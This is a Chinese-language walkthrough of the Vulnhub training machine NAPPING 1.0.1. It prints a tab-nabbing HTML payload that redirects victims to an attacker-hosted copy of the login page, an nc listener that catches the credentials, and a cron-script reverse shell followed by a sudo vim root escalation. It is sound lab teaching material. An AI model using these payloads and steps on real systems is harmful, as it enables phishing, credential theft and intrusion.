Vulnhub 靶場 NAPPING: 1.0.1
前期準備:
靶機地址:https://www.vulnhub.com/entry/napping-101,752/
kali攻擊機ip:192.168.11.129
靶機地址:192.168.11.137
一、資訊收集
1.使用nmap對靶機進行埠掃描
nmap -A -p 1-65535 192.168.11.137
發現開放了22和80埠。
2.收集80頁面的資訊
發現是個登入介面,還可以註冊,先註冊一個賬戶試試:
註冊完成後登入進去:
發現有個輸入框,看樣子是提交連線,隨便寫入一個地址試試:
提交之後再點選 Here 會跳轉到你輸入的連線:
檢視原始碼,發現站點上的此特定 URL 連結功能容易受到 Tab Nabbing 的攻擊
二、漏洞攻擊
1.釣魚
知道了使用 Tab Nabbing 攻擊後,我們先做個釣魚介面,首先先複製登入介面:
接下來,我們構建我們的惡意 html (sain.html)介面:
<!DOCTYPE html> <html> <body> <script> if(window.opener) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html'); if(window.opener != window) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html'); </script> </body> </html>
把自己複製的 index.php 和 sain.html 頁面放到 /var/www/html 下,並且開啟 python3-http 服務,開的 80 埠,和 sain.html 中的埠區分開:
監聽惡意 html 中的 8000 埠, nc -lvvp 8000
在靶機的提交連線介面提交 python3-http 服務下的 sain.html 地址:
點選提交即可,等了一會監聽的 8000 埠返回了資料包:
靶機中設定的隔幾分鐘就會用使用者登入,此時我們獲取了資料包
username=daniel
password=C@ughtm3napping123
得到了使用者名稱和密碼,我們可以通過ssh進行登入。
2.ssh登入
檢視一下使用者資訊:
可以看到 daniel 是管理員組的一部分。
使用 find 我們可以查詢任何我們可以使用命令訪問的有趣檔案
find / -group administrators -type f 2>/dev/null
檢視一下 query.py 檔案:
根據site_status.txt檔案,它似乎每 2 分鐘執行一次:
三、提權
我們需要先跳轉到 adrian 使用者,所以我們繼續在 /dev/shm 目錄中建立一個反向 shell bash 指令碼:
直接執行的話還是 daniel 使用者,我們需要更改一下 query.py 這個個指令碼來讓他定時反彈shell:
nc 監聽,等了一會得到反向shell:
獲得 adrian 使用者,檢視以下許可權:
發現可以再沒有在沒有密碼的情況下以 root 身份執行 vim ,那就直接寫入 Vim-shell:
sudo /usr/bin/vim -c ':!/bin/sh'
得到root: